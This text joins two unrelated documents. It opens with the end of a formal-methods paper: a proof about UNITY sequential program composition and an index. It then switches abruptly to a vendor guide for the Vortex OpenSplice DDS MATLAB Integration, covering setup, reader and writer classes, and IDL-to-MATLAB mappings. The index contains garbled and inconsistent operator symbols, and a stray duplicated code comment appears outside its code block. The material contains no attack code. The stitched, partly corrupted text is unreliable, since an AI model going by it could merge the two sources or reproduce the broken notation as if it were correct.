Because adding variables and initial conditions to a program trivially preserves its progress properties, Theorem strengthen_guards preservation of \( \rightarrowtail \) (A.23\(_{14}\)) and assumption \( \text{A}_1 \) can be used to establish the first conjunct. Since \( \{pc\} \subseteq wU'_P \), Theorem \( \mathcal{C} \) Monotonicity (A.2\(_{10}\)) proves the second conjunct. Finally, Theorem A.12\(_{13}\) and assumption \( \text{A}_3 \) prove the last conjunct.
B.2 Proof of Theorem 3.8
Assume the following:
A₁: \( q \mathcal{C}\ wP \)
A₂: \( J_P \vdash p \rightarrowtail^+ q \)
A₃: \( J_Q \vdash q \rightarrowtail^+ s \)
we have to prove that: \( J_{P \,;_q\, Q} \vdash p \rightarrowtail^+ s \).
Using Definition 3.5 this comes down to proving that:
\[
\forall pc\ n\ m\ U :\ \{pc\} \mathrel{\triangleleft} (P \,;_q\, Q) \land U = \text{semantics}.(P \,;_q\, Q).pc.n.s \land m = \text{max\_pc}.(P \,;_q\, Q).pc.n \;\Rightarrow\; J_U \vdash (p \land (pc = n)) \rightarrowtail (pc = m)
\]
Assuming:
A₄: \( \{pc\} \mathrel{\triangleleft} (P \,;_q\, Q) \)
A₅: \( U = \text{semantics}.(P \,;_q\, Q).pc.n.s \)
A₆: \( m = \text{max\_pc}.(P \,;_q\, Q).pc.n \)
using Definitions 2.3 and 2.4 we can deduce that there exist \( U_P, U_Q \), and \( k \), for which:
A₇: \( U_P = \text{semantics}.P.pc.n.q \)
A₈: \( k = \text{max\_pc}.P.pc.n \)
A₉: \( U_Q = \text{semantics}.Q.pc.k.s \)
A₁₀: \( m = \text{max\_pc}.Q.pc.k \)
such that:
A₁₁: \( U = U_P \mathbin{[]} U_Q \)
Now we have to prove that: \( J_{U_P \mathbin{[]} U_Q} \vdash (p \land pc = n) \rightarrowtail (pc = m) \)
Using \( \rightarrowtail \) Transitivity this proof obligation can be decomposed into two proof obligations stating the progress that is established by \( U_P \), and the progress that is established by \( U_Q \), as follows:
\[
\Leftarrow (\rightarrowtail \text{ Transitivity } (\text{A.14}_{13}))
\]
\[
J_{U_P \mathbin{[]} U_Q} \vdash (p \land pc = n) \rightarrowtail (q \land pc = k)
\]
\( \land \)
\[ J_{U_P \mathbin{[]} U_Q} \vdash (q \land pc = k) \rightarrowtail (pc = m) \]
These two conjuncts are proved using Theorem A.16\(_{13}\) (take \( r = (pc < k) \)) and Theorem A.17\(_{13}\) (take \( r = (pc \geq k) \)) respectively. Using Theorems 2.8\(_{6}\), 2.10\(_{6}\), 2.9\(_{6}\), and 2.11\(_{6}\), these proofs are straightforward.
Index
⇝ (convergence operator), 12
↢ (ignored-by operator (actions)), 9
⇣ (ignored-by operator (programs)), 11
∥ (parallel composition operator), 11
sẻ (sequential program composition), 1, 3
⇝ (reach operator), 12
↢ (reach operator), 12
⟳ (stability operator), 12
⟳+ , 7
⟳, 7
⟳, 5
⟳, 9
a (UNITY program destructor), 11
actions
atomic, 10
add_to_initial_cond, 11
composition of
UNITY programs
parallel, 1, 11
compositionality results, 1
confinement, 10
convergence (⇝)
definition, 12
ensures (progress operator)
definition, 11
execution of a UNITY program, 10
Expr (universe of state-expressions), 10
expression
state-, 10
fairness (UNITY), 10
fixed-point, 12
FP.p, 12
fresh variable, 5
guard strengthening
of programs, 14
ignored-by operator
actions (↤), 10
programs (↭), 11
ini (UNITY program destructor), 11
parallel composition (∥)
definition, 11
modelling of, 11
properties, 11
predicate, 10, see state-predicate
program
union, see parallel composition
progress property, 11
⇝ (leadsto operator), 12
↣ (reach operator), 12
⟳+, 9
⟳, 9
ensures, 11
r (UNITY program destructor), 11
reach operator (⇝)
definition, 12
properties
compositionality, 13
refinement
of programs
strengthening guards, 14
restricted union superposition, 13
definition, 14
properties
preservation of ⇝, 14
preservation of ensures, 14
preservation of ⇣, 14
RU.S (restricted union superposition operator), 14
definition, 14
properties
preservation of ⇝, 14
preservation of ensures, 14
preservation of ⇣, 14
safety property, 11
⟳, 12
⟳+, 7
unless+, 7
unless, 11
sequential program composition (⟨⟩)
intuitive definition, 1
properties, 5, 7, 8
semantics, 4
SND (HOL constant (‘a#’b)→’b), 5
stability operator (⟳), 12
definition, 12
stable predicate, 12, see also stability operator
State (state-space), 10
state
represented as function, 10
state space, 10
state-function
confinement, 10
state-predicate, 10, see also state-function
stable, 12
strengthening guards, 14
strengthen guards (of a program), 15
definition, 15
properties
preservation of $\rightarrow$, 14
symmetry, 14
superposition refinement
restricted union, 13
definition, 14
properties, 14
UNITY
fairness, 10
parallel composition $([\cdot])$, 11
definition, 11
modelling of, 11
properties, 11
program, 10
proof logic, 11
sequential program composition ($\succeq$)
intuitive definition, 1
properties, 5, 7, 8
semantics, 4
specification, 11
specification logic, 11
UNITY program, 10
destructors
a, 11
ini, 11
r, 11
w, 11
execution of a, 10
fairness, 10
modelled as a quadruple, 10
parallel composition $([\cdot])$, 11
definition, 11
modelling of, 11
properties, 11
refinement
restricted union superposition, 13
strengthening guards, 14
sequential composition ($\succeq$)
intuitive definition, 1
properties, 5, 7, 8
semantics, 4
union, see parallel composition
variables ignored by, 11
UNITY$^+$ program, 3
abstract syntax, 3
properties, 5–8
semantics, 4
variables ignored by, 5
write variables of, 3
universe of
actions (ACTION), 10
program variables (Var), 10
state-expression (Expr), 10
UNITY programs ($\mathbb{U}_\text{prog}$), 10
unless (safety operator)
definition, 11
unless$^+$ (safety operator)
definition, 7
properties, 7
$\mathbb{U}_\text{prog}$ (universe of UNITY programs), 10
Val (value-space), 10
Var (universe of variables), 10
variable
ignored, 10
weak fairness, 10
w (UNITY program destructor), 11
DDS MATLAB Guide
Release 6.x
Introduction
The DDS MATLAB Integration provides users with DDS MATLAB classes to model DDS communication using MATLAB and to interoperate with pure DDS applications.
Please refer to the DDS and MATLAB documentation for detailed information.
1.1 DDS
What is DDS?
“The Data Distribution Service (DDS™) is a middleware protocol and API standard for data-centric connectivity from the Object Management Group® (OMG®). It integrates the components of a system together, providing low-latency data connectivity, extreme reliability, and a scalable architecture that business and mission-critical Internet of Things (IoT) applications need.”
“The main goal of DDS is to share the right data at the right place at the right time, even between time-decoupled publishers and consumers. DDS implements global data space by carefully replicating relevant portions of the logically shared dataspace.” DDS specification
Further Documentation
http://portals.omg.org/dds/
http://ist.adlinktech.com/
1.2 MATLAB
What is MATLAB?
“The Language of Technical Computing
Millions of engineers and scientists worldwide use MATLAB® to analyze and design the systems and products transforming our world. MATLAB is in automobile active safety systems, interplanetary spacecraft, health monitoring devices, smart power grids, and LTE cellular networks. It is used for machine learning, signal processing, image processing, computer vision, communications, computational finance, control design, robotics, and much more.
The MATLAB platform is optimized for solving engineering and scientific problems. The matrix-based MATLAB language is the world’s most natural way to express computational mathematics. Built-in graphics make it easy to visualize and gain insights from data. A vast library of prebuilt toolboxes lets you get started right away with algorithms essential to your domain. The desktop environment invites experimentation, exploration, and discovery. These MATLAB tools and capabilities are all rigorously tested and designed to work together.
Scale. Integrate. Deploy.
MATLAB helps you take your ideas beyond the desktop. You can run your analyses on larger data sets and scale up to clusters and clouds. MATLAB code can be integrated with other languages, enabling you to deploy algorithms and applications within web, enterprise, and production systems.”
https://www.mathworks.com/products/matlab.html
This section describes the procedure to install the Vortex DDS MATLAB Integration on a Linux or Windows platform.
2.1 System Requirements
- Operating System: Windows or Linux
- MATLAB installed
- Java 1.7 or greater
2.2 OpenSplice (OSPL) and DDS MATLAB Installation
Steps:
1. Install OSPL. The DDS MATLAB Integration is included in this installer.
2. Setup OSPL license. Copy the license.lic file into the appropriate license directory.
/INSTALLDIR/Vortex_v2/license
3. DDS MATLAB files are contained in a tools/matlab folder
Example: /INSTALLDIR/Vortex_v2/Device/VortexOpenSplice/6.8.1/HDE/x86_64.linux/tools/matlab
2.3 MATLAB and DDS Setup
Steps:
1. Open command shell and run script to setup environment variables.
**Linux**
- Open a Linux terminal.
- Navigate to directory containing release.com file.
/INSTALLDIR/Vortex_v2/Device/VortexOpenSplice/6.8.1/HDE/x86_64.linux
- Run release.com. (Type in “. release.com” at command line.)
**Windows**
- Open a command prompt.
- Navigate to directory containing release.bat file.
INSTALLDIR/Vortex_v2/Device/VortexOpenSplice/6.8.1/HDE/x86_64.win64
- Run release.bat. (Type in “release.bat” at command line.)
2. Start MATLAB using the **SAME** command shell used in Step 1.
*NOTE: If MATLAB is **NOT** started from a command shell with the correct OSPL environment variables set, exceptions will occur when attempting to use DDS MATLAB classes.*
3. In MATLAB, navigate to file “Vortex_DDS_MATLAB_API.mltbx” by typing:
```
cd(fullfile(getenv('OSPL_HOME'), 'tools', 'matlab'))
```
4. Double click on the file “Vortex_DDS_MATLAB_API.mltbx”. This will bring up a dialog entitled Vortex_DDS_MATLAB_API. Select Install.
2.4 Examples
Example models have been provided in the examples folder.
Example: `/INSTALLDIR/Vortex_v2/Device/VortexOpenSplice/6.8.1/HDE/x86_64.linux/tools/matlab/examples/matlab`
The DDS MATLAB Integration provides a class library with custom classes to read and write data with DDS. The MATLAB DDS Classes are included in a Vortex package.
3.1 API Usage patterns
The typical usage pattern for the MATLAB API for Vortex DDS is the following:
- model your DDS topics using IDL
- use idlpp -l matlab to compile your IDL into MATLAB topic classes. See MATLAB Generation from IDL.
- start writing your MATLAB program using the MATLAB API for Vortex DDS.
The core classes you must use are Vortex.Topic and either Vortex.Reader or Vortex.Writer. Other classes may be required, especially if you need to adjust the Quality of Service (QoS) defaults. For details on setting QoS values with the API, see QoS Provider. The following list shows the sequence in which you would use the Vortex classes:
- If you require participant-level non-default QoS settings, create a Vortex.Participant instance. Pass the participant to subsequently created Vortex entities.
- Create one or more Vortex.Topic instances for the IDL topics your program will read or write.
- If you require publisher or subscriber level non-default QoS settings, create Vortex.Publisher and/or Vortex.Subscriber instances. Pass these to any created reader or writers. (The most common reason for changing publisher/subscriber QoS is to define non-default partitions.)
- Create Vortex.Reader and/or Vortex.Writer classes from the Vortex.Topic instances that you created.
- If you require data filtering, create Vortex.Query objects.
- Write the core of your program: create instances of your topic classes and write them, or read data and process it.
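Putting this sequence together, a minimal write-side program might look like the following sketch. It assumes a `ShapeType` topic class has already been generated by idlpp; the topic name 'Circle' and the field values are illustrative:

```matlab
% Minimal write-side sketch (assumes ShapeType was generated by idlpp).
topic  = Vortex.Topic('Circle', ?ShapeType);  % default participant, default QoS
writer = Vortex.Writer(topic);                % attached to the default participant

data = ShapeType();        % instance of the generated topic class
data.color = 'RED';
data.x = 10;
data.y = 20;
data.shapesize = 30;

ddsStatus = writer.write(data);  % 0 on success, negative on failure
```

The remainder of this chapter describes each of the classes used above in detail.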
3.2 Vortex.Topic
The MATLAB Topic class represents a DDS topic type. The DDS topic corresponds to a single data type. In DDS, data is distributed by publishing and subscribing topic data samples.
For a DDS Topic type definition, a corresponding MATLAB class must be defined in the MATLAB workspace. This is either a class created by idlpp (see MATLAB Generation from IDL) or a manually created MATLAB class (see MATLAB without IDL). It is recommended that you create DDS Topic type definitions via IDL and idlpp.
API Examples
Create a Vortex DDS domain topic. Returns a topic instance, or throws a Vortex.DDSException if the topic cannot be created.
Create a topic named ‘Circle’ based on the DDS Topic type `ShapeType` with default participant and QoS:
```matlab
topic = Vortex.Topic('Circle', ?ShapeType);
```
**Note:** In MATLAB, references to classes such as `ShapeType` are created by prefixing them with a question mark (`?`). If the class is in a MATLAB package, then the fully qualified name must be used. For example: `ShapesDemo.Topics.ShapeType`.
Create the ‘Circle’ topic with an explicitly created participant:
```matlab
% dp: a Vortex.DomainParticipant instance
topic = Vortex.Topic(dp, 'Circle', ?ShapeType);
```
Create the ‘Circle’ topic with default participant and QoS profile:
```matlab
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
topic = Vortex.Topic('Circle', ?ShapeType, qosFileURI, qosProfile);
```
Create the ‘Circle’ topic with explicit participant and QoS profile:
```matlab
% dp: a Vortex.DomainParticipant instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
topic = Vortex.Topic(dp, 'Circle', ?ShapeType, qosFileURI, qosProfile);
```
### 3.3 Vortex.DomainParticipant
The `Vortex.DomainParticipant` class represents a DDS domain participant entity.
In DDS - “A domain participant represents the local membership of the application in a domain. A domain is a distributed concept that links all the applications able to communicate with each other. It represents a communication plane: only the publishers and subscribers attached to the same domain may interact.”
**Use of the Vortex.DomainParticipant class** is optional. The API provides a ‘default participant’, which is used if no explicit domain participant is provided. The default participant is created on first usage, and is disposed when MATLAB exits. Reasons for using an explicitly created domain participant are:
- to provide non-default QoS settings.
- to control the timing of participant creation and destruction.
**API Examples**
Create a Vortex DDS domain participant. Returns participant or throws a `Vortex.DDSException` if the participant cannot be created.
Create a domain participant in the default DDS domain (the one specified by the OSPL_URI environment variable):
```matlab
dp = Vortex.DomainParticipant();
```
Create a domain participant on domain, specifying a domain id:
```matlab
% domainId: an integer value
dp = Vortex.DomainParticipant(domainId);
```
**Note:** The underlying DCPS C99 API used by `Vortex.DomainParticipant` does not currently support this operation, and will result in a `Vortex.DDSException` being raised.
Create a participant on default domain with QoS profile:
```matlab
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
dp = Vortex.DomainParticipant(qosFileURI, qosProfile);
```
Create a participant on domain with QoS profile:
```matlab
% domainId: an integer value
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
dp = Vortex.DomainParticipant(domainId, qosFileURI, qosProfile);
```
### 3.4 Vortex.Publisher
The MATLAB `Vortex.Publisher` class represents a DDS publisher entity.
In DDS, a publisher is “an object responsible for data distribution. It may publish data of different data types.”
Use of the `Vortex.Publisher` class is optional. In its place, you can use a `Vortex.DomainParticipant` instance, or default to the default domain participant. Reasons for explicitly creating a `Vortex.Publisher` instance are:
- to specify non-default QoS settings, including specifying the DDS partition upon which samples are written.
- to control the timing of publisher creation and deletion.
**API Examples**
Create a DDS Publisher entity. Returns publisher or throws a `Vortex.DDSException` if the publisher cannot be created.
Create a default publisher with default participant:
```matlab
pub = Vortex.Publisher();
```
Create a publisher with an explicit participant:
```matlab
% dp: a Vortex.DomainParticipant instance
pub = Vortex.Publisher(dp);
```
Create default publisher with default participant and QoS profile:
```matlab
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
pub = Vortex.Publisher(qosFileURI, qosProfile);
```
Create a publisher with participant and QoS profile:
```matlab
% dp: a Vortex.DomainParticipant instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
pub = Vortex.Publisher(dp, qosFileURI, qosProfile);
```
### 3.5 Vortex.Writer
The MATLAB `Vortex.Writer` class represents a DDS data writer entity.
In DDS - “The DataWriter is the object the application must use to communicate to a publisher the existence and value of data-objects of a given type.”
A `Vortex.Writer` class is required in order to write data to a DDS domain. It may be explicitly attached to a DDS publisher or a DDS domain participant; or, it is implicitly attached to the default domain participant.
A `Vortex.Writer` class instance references an existing `Vortex.Topic` instance.
**API Examples**
Create a Vortex DDS domain writer. Returns writer or throws a `Vortex.DDSException` if the writer cannot be created.
Create a writer for a topic, in the default domain participant and default QoS settings:
```matlab
% topic: a Vortex.Topic instance
writer = Vortex.Writer(topic);
```
Create a writer within an explicitly specified publisher or domain participant:
```matlab
% pubOrDp: a Vortex.Publisher or Vortex.DomainParticipant instance
% topic: a Vortex.Topic instance
writer = Vortex.Writer(pubOrDp, topic);
```
Create writer for a topic with explicit QoS profile:
```matlab
% topic: a Vortex.Topic instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
writer = Vortex.Writer(topic, qosFileURI, qosProfile);
```
Create a writer with publisher or participant, topic and QoS profile:
```matlab
% pubOrDp: a Vortex.Publisher or Vortex.DomainParticipant instance
% topic: a Vortex.Topic instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
writer = Vortex.Writer(pubOrDp, topic, qosFileURI, qosProfile);
```
Write a ShapeType topic class instance to a writer:
```matlab
% writer: a Vortex.Writer instance
% ShapeType: a 'topic class' created manually or via IDLPP
data = ShapeType(); % create an object instance
% set data values...
data.color = 'RED';
% ... set other values ...
ddsStatus = writer.write(data);
```
**Note:** the returned status value is 0 for success, and negative for failure. Use the Vortex.DDSException class to decode a failure status.
Dispose a DDS topic instance:
```matlab
% writer: a Vortex.Writer instance
% ShapeType: a 'topic class' created manually or via IDLPP
data = ShapeType(); % create an object instance
% set data key values...
data.color = 'RED';
ddsStatus = writer.dispose(data);
```
**Note:** the returned status value is 0 for success, and negative for failure. Use the Vortex.DDSException class to decode a failure status.
Unregister a DDS topic instance:
```matlab
% writer: a Vortex.Writer instance
% ShapeType: a 'topic class' created manually or via IDLPP
data = ShapeType(); % create an object instance
% set data key values...
data.color = 'RED';
ddsStatus = writer.unregister(data);
```
**Note:** the returned status value is 0 for success, and negative for failure. Use the Vortex.DDSException class to decode a failure status.
3.6 Vortex.Subscriber
The MATLAB Vortex.Subscriber class represents a DDS subscriber entity. In DDS, a subscriber is “an object responsible for receiving published data and making it available to the receiving application. It may receive and dispatch data of different specified types.”
Use of the Vortex.Subscriber class is optional. In its place, you can use a Vortex.DomainParticipant instance, or default to the default domain participant. Reasons for explicitly creating a Vortex.Subscriber instance are:
- to specify non-default QoS settings, including specifying the DDS partition from which samples are read.
- to control the timing of subscriber creation and deletion.
API Examples
Create a Vortex DDS domain subscriber. Returns a subscriber or throws a Vortex.DDSException if the subscriber cannot be created.
Create a subscriber within the default domain participant:
```matlab
sub = Vortex.Subscriber();
```
Create a subscriber within an explicit participant:
```matlab
% dp: a Vortex.DomainParticipant instance
sub = Vortex.Subscriber(dp);
```
Create subscriber within the default domain participant and with a QoS profile:
```matlab
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
sub = Vortex.Subscriber(qosFileURI, qosProfile);
```
Create a subscriber with participant and QoS profile:
```matlab
% dp: a Vortex.DomainParticipant instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
sub = Vortex.Subscriber(dp, qosFileURI, qosProfile);
```
3.7 Vortex.Reader
The MATLAB Vortex.Reader class represents a DDS data reader entity. In DDS - “To access the received data, the application must use a typed DataReader attached to the subscriber.”
A Vortex.Reader class is required in order to read data from a DDS domain. It may be explicitly attached to a DDS subscriber or a DDS domain participant; or, it is implicitly attached to the default domain participant.
A Vortex.Reader class instance references an existing Vortex.Topic instance.
API Examples
Create a Vortex DDS domain reader. Returns a reader or throws a Vortex.DDSException if the reader cannot be created.
Create a reader for a topic within the default domain participant, and with default QoS:
```matlab
% topic: a Vortex.Topic instance
reader = Vortex.Reader(topic);
```
Create a reader for a topic within a subscriber or participant, and with default QoS:
```matlab
% subOrDp: a Vortex.Subscriber or Vortex.DomainParticipant instance
% topic: a Vortex.Topic instance
reader = Vortex.Reader(subOrDp, topic);
```
Create a reader for a topic within the default domain participant and with a QoS profile:
```matlab
% topic: a Vortex.Topic instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
reader = Vortex.Reader(topic, qosFileURI, qosProfile);
```
Create a reader for a topic within a subscriber or participant, with a QoS profile:
```matlab
% subOrDp: a Vortex.Subscriber or Vortex.DomainParticipant instance
% topic: a Vortex.Topic instance
% qosFileURI: a char array representing a file: URI
% qosProfile: a char array containing the name of a profile defined in the QoS File
reader = Vortex.Reader(subOrDp, topic, qosFileURI, qosProfile);
```
Take data from a data reader:
```matlab
% reader: a Vortex.Reader
[data, dataState] = reader.take;
% data: an array of topic class instances (e.g. ShapeType); possibly empty
% dataState: a struct array; each entry describes the
%   state of the corresponding data entry
```
Read data from a data reader:
```matlab
% reader: a Vortex.Reader
[data, dataState] = reader.read;
% data: an array of topic class instances (e.g. ShapeType); possibly empty
% dataState: a struct array; each entry describes the
%   state of the corresponding data entry
```
Specify a wait timeout, in seconds, before read or take will return without receiving data:
```matlab
% reader: a Vortex.Reader
reader.waitsetTimeout(2.0);
```
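Combining the calls above, a simple receive loop might look like the following sketch. The ten-iteration loop and the fields printed are illustrative choices, not part of the API; a `ShapeType` reader is assumed:

```matlab
% reader: a Vortex.Reader for a ShapeType topic
reader.waitsetTimeout(2.0);          % block at most 2 s per take
for i = 1:10
    [data, dataState] = reader.take; % data may be empty if the timeout expired
    for k = 1:numel(data)
        fprintf('sample %d: color=%s x=%d y=%d\n', ...
            k, data(k).color, data(k).x, data(k).y);
    end
end
```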
3.8 Vortex.Query
The MATLAB Vortex.Query class represents a DDS query entity.
A query is a data reader, restricted to accessing data that matches specific status conditions and/or a filter expression.
A Vortex.Query class instance references an existing Vortex.Reader instance.
API Examples
Create a Vortex.Query instance or throw a Vortex.DDSException if an error occurs.
Create a query based on a state mask only:
```matlab
% reader: a Vortex.Reader
% only receive samples that:
% * have not been read by this application
% * AND are for instances not previously seen by this application
% * AND for which there is a live writer
mask = Vortex.DataState.withNew().withNotRead().withAlive();
query = Vortex.Query(reader, mask);
```
Create a query based on a state mask and a filter expression:
```matlab
% reader: a Vortex.Reader
mask = Vortex.DataState.withAnyState();
filter = 'color = %0 and x > %1';
% filter for 'RED' shapes with x > 10...
query = Vortex.Query(reader, mask, filter, {'RED', 10});
```
Take data from a query:
```matlab
% query: a Vortex.Query
[data, dataState] = query.take;
% data: an array of topic class instances (e.g. ShapeType); possibly empty
% dataState: a struct array; each entry describes the
%   state of the corresponding data entry
```
Read data from a query:
```matlab
% query: a Vortex.Query
[data, dataState] = query.read;
% data: an array of topic class instances (e.g. ShapeType); possibly empty
% dataState: a struct array; each entry describes the
%   state of the corresponding data entry
```
Specify a wait timeout, in seconds, before read or take will return without receiving data:
```matlab
% query: a Vortex.Query
% specify the waitset timeout on the reader
query.waitsetTimeout(2.0);
% now, read or take using 'query'
```
% now, read or take 'query'
3.9 Vortex.DDSException
A Vortex.DDSException is thrown when a DDS error occurs. The class can also be used to decode an error status code returned by methods such as Vortex.Writer.write.
API Examples
Catch a DDS error while creating a DDS entity:
```matlab
% dp: a Vortex.DomainParticipant
try
    topic = Vortex.Topic('Circle', ?SomeAlternateDef.ShapeType);
catch ex
    switch ex.identifier
        case 'Vortex:DDSError'
            % it's a Vortex error
            fprintf(['DDS reports error:\n' ...
                '    %s\n' ...
                '    DDS ret code: %s (%d)\n'], ...
                ex.message, char(ex.dds_ret_code), ex.dds_ret_code);
        otherwise
            rethrow(ex);
    end
end
```
Decode a DDS status code returned by Vortex.Writer.write:
```matlab
% ddsStatus: a Vortex.Writer.write return value
ex = Vortex.DDSException('', ddsStatus);
switch ex.dds_ret_code
    case Vortex.DDSReturnCode.DDS_RETCODE_OK
        % ...
    case Vortex.DDSReturnCode.DDS_BAD_PARAMETER
        % ...
    case Vortex.DDSReturnCode.DDS_RETCODE_INCONSISTENT_POLICY
        % ...
end
```
MATLAB Generation from IDL
The DDS MATLAB Integration supports generation of MATLAB classes from IDL. This chapter describes the details of the IDL-MATLAB binding.
4.1 Running IDLPP
Compiling IDL into MATLAB code is done using the -l matlab switch on idlpp:
```
idlpp -l matlab idl-file-to-compile.idl
```
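As an illustration, an IDL file defining the `ShapeType` used throughout this guide might look like the following. This file is an assumption reconstructed from the MATLAB class shown in MATLAB without IDL and the package name `ShapesDemo.Topics` mentioned earlier; the `#pragma keylist` directive marks `color` as the topic key:

```idl
module ShapesDemo {
    module Topics {
        struct ShapeType {
            string color;   // key field
            long x;
            long y;
            long shapesize;
        };
#pragma keylist ShapeType color
    };
};
```

Running `idlpp -l matlab` on such a file produces a `+ShapesDemo/+Topics` package folder containing `ShapeType.m`.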
Generated Artifacts
The following table defines the MATLAB artifacts generated from IDL concepts:
<table>
<thead>
<tr>
<th>IDL Concept</th>
<th>MATLAB Concept</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td>module</td>
<td>package</td>
<td>a MATLAB package is a folder starting with <code>+</code>.</td>
</tr>
<tr>
<td>enum</td>
<td>class</td>
<td>a MATLAB .m file.</td>
</tr>
<tr>
<td>enum value</td>
<td>enum value</td>
<td></td>
</tr>
<tr>
<td>struct</td>
<td>class</td>
<td>a MATLAB .m file.</td>
</tr>
<tr>
<td>field</td>
<td>class property</td>
<td></td>
</tr>
<tr>
<td>typedef</td>
<td>Unsupported</td>
<td>IDL typedef's are inlined.</td>
</tr>
<tr>
<td>union</td>
<td>Unsupported</td>
<td></td>
</tr>
<tr>
<td>inheritance</td>
<td>Unsupported</td>
<td></td>
</tr>
</tbody>
</table>
Datatype mappings
The following table shows the MATLAB equivalents to IDL primitive types:
<table>
<thead>
<tr>
<th>IDL Type</th>
<th>MATLAB Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>boolean</td>
<td>logical</td>
</tr>
<tr>
<td>char</td>
<td>int8</td>
</tr>
<tr>
<td>octet</td>
<td>uint8</td>
</tr>
<tr>
<td>short</td>
<td>int16</td>
</tr>
<tr>
<td>ushort</td>
<td>uint16</td>
</tr>
<tr>
<td>long</td>
<td>int32</td>
</tr>
<tr>
<td>ulong</td>
<td>uint32</td>
</tr>
<tr>
<td>long long</td>
<td>int64</td>
</tr>
<tr>
<td>ulong long</td>
<td>uint64</td>
</tr>
<tr>
<td>float</td>
<td>single</td>
</tr>
<tr>
<td>double</td>
<td>double</td>
</tr>
<tr>
<td>string</td>
<td>char</td>
</tr>
<tr>
<td>wchar</td>
<td>Unsupported</td>
</tr>
<tr>
<td>wstring</td>
<td>Unsupported</td>
</tr>
<tr>
<td>any</td>
<td>Unsupported</td>
</tr>
<tr>
<td>long double</td>
<td>Unsupported</td>
</tr>
</tbody>
</table>
Implementing Arrays and Sequences in MATLAB
Both IDL arrays and IDL sequences are mapped to MATLAB arrays. MATLAB supports both native array types, which must have homogeneous contents, and cell arrays, which may have heterogeneous content. In general, IDLPP prefers native arrays, as they support more straightforward type checking. However, some situations require cell arrays. The following table summarizes the cases where IDLPP will generate cell arrays:
<table>
<thead>
<tr>
<th>Datatype</th>
<th>Sample Syntax</th>
<th>Reason for using cell array</th>
</tr>
</thead>
<tbody>
<tr>
<td>sequence of sequence</td>
<td>sequence<sequence<T>> f;</td>
<td>Nested sequences need not have a homogeneous length</td>
</tr>
<tr>
<td>array of sequence</td>
<td>sequence<T> f[N];</td>
<td>Sequence lengths need not be homogeneous</td>
</tr>
<tr>
<td>sequence of array</td>
<td>sequence<A> f;</td>
<td>A multi-dim array makes adding elements too difficult</td>
</tr>
<tr>
<td>sequence of string</td>
<td>sequence<string> f;</td>
<td>Nested strings need not have a homogeneous length</td>
</tr>
<tr>
<td>string array</td>
<td>string f[N];</td>
<td>Nested strings need not have a homogeneous length</td>
</tr>
</tbody>
</table>
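For example, a hypothetical topic field declared in IDL as `sequence<string> names;` would be represented in MATLAB as a cell array, since the contained strings may differ in length (the type and field names here are illustrative, not from the product):

```matlab
% IDL: sequence<string> names;   (hypothetical field)
data = SomeTopicType();          % hypothetical generated topic class
data.names = {'red', 'green', 'blue'};  % cell array: elements may vary in length
```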
### 4.2 Limitations of MATLAB Support
The IDL-to-MATLAB binding has the following limitations:
- IDL unions are not supported
- the following IDL data types are not supported: wchar, wstring, any and long double
- arrays of sequences of structures are not supported
MATLAB without IDL
It is possible, but not recommended, to directly create MATLAB classes that represent DDS topics. This approach allows you to quickly start using Vortex DDS, but it has a number of disadvantages:
- without IDL, you cannot reliably define the topic in other language bindings.
- not all IDL types are available.
### 5.1 Creating a MATLAB Topic class
To create a Topic Class without IDL, create a MATLAB class that inherits from Vortex.AbstractType. The class will be interpreted as an IDL struct. Class properties will be interpreted as IDL struct fields. Finally, the class must define a static method `getKey`, which returns a comma-separated list of key fields for the topic.
The following shows a simple MATLAB class, `ShapeType`:
```matlab
classdef ShapeType < Vortex.AbstractType
properties
color char % IDL: string color;
x int32 % IDL: long x;
y int32 % IDL: long y;
shapesize int32 % IDL: long shapesize;
end
methods (Static)
function keys = getKey
keys = 'color';
end
end
end
```
The topic class defines four fields, and identifies the `color` field as the topic key.
You would use the topic class in the same way as one generated by IDLPP. The following example shows the creation of a DDS topic object from a topic class:
```matlab
% define a Vortex DDS topic called 'Circle'
circleTopic = Vortex.Topic('Circle', ?ShapeType);
```
With the `circleTopic` variable, you can then create appropriate Vortex DDS readers and writers.
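For instance, a minimal sketch of writing a sample through this manually defined topic, reusing the write pattern from the Vortex.Writer section (the field values are illustrative):

```matlab
% circleTopic: the Vortex.Topic created above from the hand-written ShapeType
writer = Vortex.Writer(circleTopic);

data = ShapeType();
data.color = 'BLUE';
data.x = 50;
data.y = 50;
data.shapesize = 25;

ddsStatus = writer.write(data);  % 0 on success, negative on failure
```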
### 5.2 Mapping of MATLAB types to IDL types
When using an IDL-less Topic class, the Vortex DDS API for MATLAB maps property types to IDL types as follows:
<table>
<thead>
<tr>
<th>MATLAB Type</th>
<th>IDL Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>logical</td>
<td>boolean</td>
</tr>
<tr>
<td>int8</td>
<td>char</td>
</tr>
<tr>
<td>uint8</td>
<td>octet</td>
</tr>
<tr>
<td>int16</td>
<td>short</td>
</tr>
<tr>
<td>uint16</td>
<td>unsigned short</td>
</tr>
<tr>
<td>int32</td>
<td>long</td>
</tr>
<tr>
<td>uint32</td>
<td>unsigned long</td>
</tr>
<tr>
<td>int64</td>
<td>long long</td>
</tr>
<tr>
<td>uint64</td>
<td>unsigned long long</td>
</tr>
<tr>
<td>single</td>
<td>float</td>
</tr>
<tr>
<td>double</td>
<td>double</td>
</tr>
<tr>
<td>char</td>
<td>string</td>
</tr>
<tr>
<td>class</td>
<td>equivalent IDL struct</td>
</tr>
<tr>
<td>enum class</td>
<td>equivalent IDL enum</td>
</tr>
<tr>
<td>(no type specified)</td>
<td>double</td>
</tr>
</tbody>
</table>
